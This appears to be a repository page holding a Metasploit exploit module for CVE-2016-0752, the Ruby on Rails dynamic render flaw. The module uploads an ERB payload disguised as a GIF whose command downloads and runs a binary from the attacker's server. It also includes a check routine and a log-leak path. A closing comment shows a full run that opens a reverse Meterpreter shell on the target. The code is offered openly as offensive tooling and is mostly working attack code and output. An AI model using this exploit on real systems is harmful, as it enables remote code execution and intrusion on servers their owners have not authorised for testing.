adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
3c3f424a4d27a6e3c28fd4ca9ee250c433ca1132
metasploit-gs/modules/exploits/multi/http/rails_dynamic_render_code_exec.rb
T
mr_me 3c3f424a4d added a some references
2016-10-10 17:56:03 -05:00

247 lines
8.5 KiB
Ruby
Raw Blame History

require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Ruby on Rails Dynamic Render File Upload Remote Code Execution',
'Description' => %q{
This module exploits a remote code execution vulnerability in the explicit render
method when leveraging user parameters.
This module has been tested across multiple versions of Ruby on Rails.
The technique used by this module requires the specified
endpoint to be using dynamic render paths, such as the following example:
def show
render params[:id]
end
Also, the vulnerable target will need a POST endpoint for the TempFile upload, this
can literally be any endpoint. This module doesnt use the log inclusion method of
exploitation due to it not being universal enough. Instead, a new code injection
technique was found and used whereby an attacker can upload temporary image files
against any POST endpoint and use them for the inclusion attack. Finally, you only
get one shot at this if you are testing with the builtin rails server, use caution.
},
'Author' =>
[
'mr_me <mr_me@offensive-security.com>', # necromanced old bug & discovered new vector rce vector
'John Poulin (forced-request)' # original render bug finder
],
'References' =>
[
[ 'CVE', '2016-0752'],
[ 'URL', 'https://groups.google.com/forum/#!topic/rubyonrails-security/335P1DcLG00'], # rails patch
[ 'URL', 'https://nvisium.com/blog/2016/01/26/rails-dynamic-render-to-rce-cve-2016-0752/'], # John Poulin CVE-2016-0752 patched in 5.0.0.beta1.1 - January 25, 2016
[ 'URL', 'https://gist.github.com/forced-request/5158759a6418e6376afb'], # John's original exploit
],
'License' => MSF_LICENSE,
'Platform' => ['linux', 'bsd'],
'Arch' => ARCH_X86,
'Payload' =>
{
'DisableNops' => true,
},
'Privileged' => false,
'Targets' =>
[
[ 'Ruby on Rails 4.0.8 July 2, 2014', {} ] # Other versions are also affected
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Oct 16 2016'))
register_options(
[
Opt::RPORT(3000),
OptString.new('URIPATH', [ true, 'The path to the vulnerable route', "/users"]),
OptPort.new('SRVPORT', [ true, 'The daemon port to listen on', 1337 ]),
], self.class)
end
def check
# this is the check for the dev environment
res = send_request_cgi({
'uri' => normalize_uri(datastore['URIPATH'], "%2f"),
'method' => 'GET',
}, 60)
# if the page controller is dynamically rendering, its probably vuln
if res and res.body =~ /render params/
return Exploit::CheckCode::Vulnerable
end
# this is the check for the prod environment
res = send_request_cgi({
'uri' => normalize_uri(datastore['URIPATH'], "%2fproc%2fself%2fcomm"),
'method' => 'GET',
}, 60)
# maybe its exploitable
if res and res.body =~ /ruby/
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def on_request_uri(cli, request)
if (not @pl)
print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!")
return
end
print_status("#{rhost}:#{rport} - Sending the payload to the server...")
@elf_sent = true
send_response(cli, @pl)
end
def send_payload
@bd = rand_text_alpha(8+rand(8))
fn = rand_text_alpha(8+rand(8))
un = rand_text_alpha(8+rand(8))
pn = rand_text_alpha(8+rand(8))
register_file_for_cleanup("/tmp/#{@bd}")
cmd = "wget #{@service_url} -O /tmp/#{@bd};"
cmd << "chmod 755 /tmp/#{@bd};"
cmd << "/tmp/#{@bd}"
pay = "<%=`#{cmd}`%>"
print_status("uploading image...")
data = Rex::MIME::Message.new
data.add_part(pay, nil, nil, 'form-data; name="#{un}"; filename="#{fn}.gif"')
res = send_request_cgi({
'method' => 'POST',
'cookie' => @cookie,
'uri' => normalize_uri(datastore['URIPATH'], pn),
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => data.to_s
})
if res and res.code == 422 and res.body =~ /Tempfile:\/(.*)&gt;/
@path = "#{$1}" if res.body =~ /Tempfile:\/(.*)&gt;/
return true
else
# this is where we pull the log file
if leak_log
return true
end
end
return false
end
def leak_log
# path to the log /proc/self/fd/7
# this bypasses the extension check
res = send_request_cgi({
'uri' => normalize_uri(datastore['URIPATH'], "proc%2fself%2ffd%2f7"),
'method' => 'GET',
}, 60)
if res and res.code == 200 and res.body =~ /Tempfile:\/(.*)>, @original_filename=/
@path = "#{$1}" if res.body =~ /Tempfile:\/(.*)>, @original_filename=/
return true
end
return false
end
def start_http_server
@pl = generate_payload_exe
@elf_sent = false
downfile = rand_text_alpha(8+rand(8))
resource_uri = '/' + downfile
# do not use SSL for the attacking web server
if datastore['SSL']
ssl_restore = true
datastore['SSL'] = false
end
if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
srv_host = datastore['URIHOST'] || Rex::Socket.source_address(rhost)
else
srv_host = datastore['SRVHOST']
end
@service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri
service_url_payload = srv_host + resource_uri
print_status("#{rhost}:#{rport} - Starting up our web service on #{@service_url} ...")
start_service({'Uri' => {
'Proc' => Proc.new { |cli, req|
on_request_uri(cli, req)
},
'Path' => resource_uri
}})
datastore['SSL'] = true if ssl_restore
connect
end
def render_tmpfile
@path.gsub!(/\//, '%2f')
res = send_request_cgi({
'uri' => normalize_uri(datastore['URIPATH'], @path),
'method' => 'GET',
}, 1)
end
def exploit
print_status("Sending initial request to detect exploitability")
start_http_server
if send_payload
print_good("injected payload")
render_tmpfile
# we need to delay, for the stager
select(nil, nil, nil, 5)
end
end
end
=begin
saturn:metasploit-framework mr_me$ cat scripts/rails.rc
use exploit/multi/http/rails_dynamic_render_code_exec
set RHOST 172.16.175.251
set payload linux/x86/meterpreter/reverse_tcp
set LHOST 172.16.175.1
check
exploit
saturn:metasploit-framework mr_me$ ./msfconsole -qr scripts/rails.rc
[*] Processing scripts/rails.rc for ERB directives.
resource (scripts/rails.rc)> use exploit/multi/http/rails_dynamic_render_code_exec
resource (scripts/rails.rc)> set RHOST 172.16.175.251
RHOST => 172.16.175.251
resource (scripts/rails.rc)> set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
resource (scripts/rails.rc)> set LHOST 172.16.175.1
LHOST => 172.16.175.1
resource (scripts/rails.rc)> check
[+] 172.16.175.251:3000 The target is vulnerable.
resource (scripts/rails.rc)> exploit
[*] Exploit running as background job.
[*] Started reverse TCP handler on 172.16.175.1:4444
[*] Sending initial request to detect exploitability
msf exploit(rails_dynamic_render_code_exec) > [*] 172.16.175.251:3000 - Starting up our web service on http://172.16.175.1:1337/iUDaRVpz ...
[*] Using URL: http://0.0.0.0:1337/iUDaRVpz
[*] Local IP: http://192.168.100.13:1337/iUDaRVpz
[*] uploading image...
[+] injected payload
[*] 172.16.175.251:3000 - Sending the payload to the server...
[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
[*] Sending stage (1495599 bytes) to 172.16.175.251
[*] Meterpreter session 1 opened (172.16.175.1:4444 -> 172.16.175.251:41246) at 2016-09-29 17:52:00 -0500
[+] Deleted /tmp/NhhGKCCIgwF
msf exploit(rails_dynamic_render_code_exec) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > shell
Process 50809 created.
Channel 1 created.
$ id
uid=1000(student) gid=1000(student) groups=1000(student),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),110(lpadmin),113(scanner),117(bluetooth)
$
=end
Reference in New Issue View Git Blame Copy Permalink